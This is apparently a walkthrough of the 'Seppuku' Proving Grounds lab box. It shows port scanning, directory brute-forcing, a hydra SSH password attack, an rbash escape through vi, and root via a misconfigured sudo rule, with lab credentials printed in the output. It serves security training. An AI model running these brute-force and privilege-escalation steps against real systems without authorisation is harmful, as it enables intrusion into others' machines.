This is a write up for the box Seppuku on proving grounds which is a Linux based box rated as easy.
Enumeration: Port Scan
Starting off by running RustScan on the box to find out some open ports.
┌──(hhhharshil㉿kali)-[~/Desktop/seppuku]
└─$ rustscan -a 192.168.116.90 -- -sC -sV
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
Please contribute more quotes to our GitHub https://github.com/rustscan/rustscan
[~] The config file is expected to be at "/home/hhhharshil/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.116.90:21
Open 192.168.116.90:22
Open 192.168.116.90:80
Open 192.168.116.90:139
Open 192.168.116.90:445
Open 192.168.116.90:7080
Open 192.168.116.90:7601
Open 192.168.116.90:8088
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack vsftpd 3.0.3
22/tcp open ssh syn-ack OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 cd:55:a8:e4:0f:28:bc:b2:a6:7d:41:76:bb:9f:71:f4 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDhKnaNVJ/YnScPD1GDZSIfyC/a4jjHhSnoEgi2c/c03kE4JVZbA4cTFeEHGq4PFTyiuchv9w9zNu8XtVIDhILb9K4D38EssujmpekrrAnYkS0yU8Kqas1+3FCY8xjz6a5yVdMk/aQVa4BfFXWnv+rdlio0ZFVdLDaRaG90KMUEVw18Ogzt9lBbnbf7gOR0EGPKW0
xzyDyI70u5FJnarDFV9jCZL/flcCL0m+MAycgdFyFqCOTjNxd8Qn2R3rnhgjSER5C9c+qEI/htLmtnXTC0p6AMeTDjO3J57LEB1WFYJ4wkeuEUtPadfhwgDR16XqWmqw2HcBIj1W9H9V47KFfR
| 256 16:fa:29:e4:e0:8a:2e:7d:37:d2:6f:42:b2:dc:e9:22 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBC+yj9GRgyn2boC7Dw9un6PEwviM8NZ1CRTjmrHRFiOT+0co+OOwxD5RRQCxuS22zJgsiDIEka8ypTjYWlnJ9T8=
| 256 bb:74:e8:97:fa:30:8d:da:f9:5c:99:f0:d9:24:8a:d5 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIESejQ038eElmlRfbqAgaRSK120jvrz9WQ5UcjxJdJ71
80/tcp open http syn-ack nginx 1.14.2
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=Restricted Content
|_http-server-header: nginx/1.14.2
|_http-title: 401 Authorization Required
139/tcp open netbios-ssn syn-ack Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn syn-ack Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
7080/tcp open ssl/empowerid syn-ack LiteSpeed
| http-methods:
|_ Supported Methods: GET HEAD POST
|_http-server-header: LiteSpeed
|_http-title: Did not follow redirect to https://192.168.116.90:7080/
| ssl-cert: Subject: commonName=seppuku/organizationName=LiteSpeedCommunity/stateOrProvinceName=NJ/countryName=US/name=openlitespeed/organizationalUnitName=Testing/localityName=Virtual/emailAddress=mail@seppuku/initials=CP/dnQualifier=o
penlitespeed
| Issuer: commonName=seppuku/organizationName=LiteSpeedCommunity/stateOrProvinceName=NJ/countryName=US/name=openlitespeed/organizationalUnitName=Testing/localityName=Virtual/emailAddress=mail@seppuku/initials=CP/dnQualifier=openlitespee
d
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-05-13T06:51:35
| Not valid after: 2022-08-11T06:51:35
| MD5: 2002 61c4 9f2d 6bfa 21d1 477c 21d9 e703
| SHA-1: e44a c855 93ba b3f8 b2f3 7ce5 db7f a350 2f49 c7ca
7601/tcp open http syn-ack Apache httpd 2.4.38 ((Debian))
| http-methods:
|_ Supported Methods: OPTIONS HEAD GET POST
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Seppuku
8088/tcp open http syn-ack LiteSpeed httpd
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: LiteSpeed
|_http-title: Seppuku
Service Info: Host: SEPPUKU; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
- 21 FTP - no anon login
- 80 HTTP - requires user/pass
- 139/445 SMB - default shares
- 7080 - HTTPS
- 7601 - HTTP seppuku http title most interesting
- 8081 - HTTP clone of 7601
Enumeration: HTTP
Since the web page on port 7061 mentions seppuku which is the box name I will start by attempting to look for any hidden directories with gobuster.
┌──(hhhharshil㉿kali)-[~/Desktop/seppuku]
└─$ gobuster dir -u http://192.168.116.90:7601/ --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 1 ⨯
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.116.90:7601/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/12/29 15:13:49 Starting gobuster in directory enumeration mode
===============================================================
/b (Status: 301) [Size: 319] [--> http://192.168.116.90:7601/b/]
/a (Status: 301) [Size: 319] [--> http://192.168.116.90:7601/a/]
/c (Status: 301) [Size: 319] [--> http://192.168.116.90:7601/c/]
/t (Status: 301) [Size: 319] [--> http://192.168.116.90:7601/t/]
/r (Status: 301) [Size: 319] [--> http://192.168.116.90:7601/r/]
/d (Status: 301) [Size: 319] [--> http://192.168.116.90:7601/d/]
/f (Status: 301) [Size: 319] [--> http://192.168.116.90:7601/f/]
/e (Status: 301) [Size: 319] [--> http://192.168.116.90:7601/e/]
/h (Status: 301) [Size: 319] [--> http://192.168.116.90:7601/h/]
/w (Status: 301) [Size: 319] [--> http://192.168.116.90:7601/w/]
/q (Status: 301) [Size: 319] [--> http://192.168.116.90:7601/q/]
/database (Status: 301) [Size: 326] [--> http://192.168.116.90:7601/database/]
/production (Status: 301) [Size: 328] [--> http://192.168.116.90:7601/production/]
/keys (Status: 301) [Size: 322] [--> http://192.168.116.90:7601/keys/]
/secret (Status: 301) [Size: 324] [--> http://192.168.116.90:7601/secret/]
Recursive directory busting displays that there is a keys directory located on the HTTP server running on port 7601.
The keys directory displays that there is a private and private.bak files. I will download these to my box. After viewing the contents it can be determined that these are the ssh private keys. But we do not have a user yet.
There is also a /secret folder which contains passwd and shadow files as well as a password list. I will download all these files.
First I looked at the passwd.bak folder for any users sadly it was a rabbit-hole.
┌──(hhhharshil㉿kali)-[~/Desktop/seppuku]
└─$ cat passwd.bak | grep sh
root:x:0:0:root:/root:/bin/bash
thpot:x:122:65534:Honeypot user,,,:/usr/share/thpot:/dev/null
sshd:x:126:65534::/run/sshd:/usr/sbin/nologin
rabbit-hole:x:1001:1001:,,,:/home/rabbit-hole:/bin/bash
We did however get a hostname/username of seppuku from: http://192.168.116.90:7601/secret/hostname
We have a password.list that we can use to bruteforce the ssh service.
┌──(hhhharshil㉿kali)-[~/Desktop/seppuku]
└─$ hydra -l seppuku -P password.lst 192.168.116.90 ssh
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-12-29 15:20:52
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 93 login tries (l:1/p:93), ~6 tries per task
[DATA] attacking ssh://192.168.116.90:22/
[22][ssh] host: 192.168.116.90 login: seppuku password: eeyoree
1 of 1 target successfully completed, 1 valid password found
We found a valid password of eeyoree for the user seppuku
SSH Foothold
After successfully logging in as the user seppuku we are greeted with a restricted bash shell
┌──(hhhharshil㉿kali)-[~/Desktop/seppuku]
└─$ ssh seppuku@192.168.116.90
seppuku@192.168.116.90's password:
Linux seppuku 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2 (2020-04-29) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Dec 29 15:22:39 2021 from 192.168.49.116
seppuku@seppuku:~$ cd .
-rbash: cd: restricted
This can be bypassed however using a vi to escape the rbash shell
seppuku@seppuku:~$ vi
(in vi)
:set shell=/bin/bash
:shell
Privilege Escalation
Looking through the home folder of the user seppuku we find a .passwd file. Now that we have new credentials we can try switching users.
seppuku@seppuku:~$ ls -la
total 36
drwxr-xr-x 3 seppuku seppuku 4096 Dec 29 15:22 .
drwxr-xr-x 5 root root 4096 May 13 2020 ..
-rw------- 1 seppuku seppuku 20 Dec 29 15:22 .bash_history
-rw-r--r-- 1 seppuku seppuku 220 May 13 2020 .bash_logout
-rw-r--r-- 1 seppuku seppuku 3526 May 13 2020 .bashrc
drwx------ 3 seppuku seppuku 4096 May 13 2020 .gnupg
-rw-r--r-- 1 seppuku seppuku 33 Dec 29 14:48 local.txt
-rw-r--r-- 1 root root 20 May 13 2020 .passwd
-rw-r--r-- 1 seppuku seppuku 807 May 13 2020 .profile
seppuku@seppuku:~$ cat .passwd
12345685213456!@!@A
seppuku@seppuku:/home$ su tanto
Password:
su: Authentication failure
seppuku@seppuku:/home$ su samurai
Password:
samurai@seppuku:/home$
After switching users I did sudo -l to see what commands can be executed as root.
samurai@seppuku:/home$ sudo -l
Matching Defaults entries for samurai on seppuku:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User samurai may run the following commands on seppuku:
(ALL) NOPASSWD: /../../../../../../home/tanto/.cgi_bin/bin /tmp/*
This appears to be a dead end till we are able to get into the tanto user however we do have a ssh key that we downloaded earlier.
I will chmod 600 the private key and ssh into the box as tanto.
┌──(hhhharshil㉿kali)-[~/Desktop/seppuku]
└─$ ssh -i id_rsa tanto@192.168.116.90 -t "bash -noprofile"
tanto@seppuku:~$
tanto@seppuku:~$ ls -la
total 28
drwxr-xr-x 4 tanto tanto 4096 Sep 1 2020 .
drwxr-xr-x 5 root root 4096 May 13 2020 ..
-rw-r--r-- 1 tanto tanto 220 May 13 2020 .bash_logout
-rw-r--r-- 1 tanto tanto 3526 May 13 2020 .bashrc
drwx------ 3 tanto tanto 4096 May 13 2020 .gnupg
-rw-r--r-- 1 tanto tanto 807 May 13 2020 .profile
drwxr-xr-x 2 tanto tanto 4096 May 13 2020 .ssh
tanto@seppuku:~$
There is no folder named .cgi_bin so I will have to construct the path from the sudo -l output myself.
I created the .cgi_bin folder and then made a bin file which executes /bin/bash. Then chmod +x to ensure its executable by everyone.
tanto@seppuku:~/.cgi_bin$ echo "/bin/bash" > bin
tanto@seppuku:~/.cgi_bin$ chmod +x bin
tanto@seppuku:~/.cgi_bin$ ls
bin
Now to exploit this we have to su back to samurai and then run the command from sudo -l
samurai@seppuku:/home/tanto/.cgi_bin$ sudo -l
Matching Defaults entries for samurai on seppuku:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User samurai may run the following commands on seppuku:
(ALL) NOPASSWD: /../../../../../../home/tanto/.cgi_bin/bin /tmp/*
samurai@seppuku:/home/tanto/.cgi_bin$ sudo /../../../../../../home/tanto/.cgi_bin/bin /tmp/*
root@seppuku:/home/tanto/.cgi_bin# whoami
root
Breakdown
- Directory busting exposed a /private and /secret directory which contained files allowing that allowed us to bruteforce ssh
- After logging in as Seppuku we had to escape the rbash shell using vi
- A .passwd file was found in seppukus home folder containing a password used to su to user samurai
- Samurai was able to execute a file located in tanto’s home folder as root.
- The SSH key found from /private belonged to tanto
- SSH as the user tanto escape the rbash shell again.
- Create the .cgibin/ directory with a bin file executing /bin/bash
- su back to samurai execute the command from sudo -l then get root user.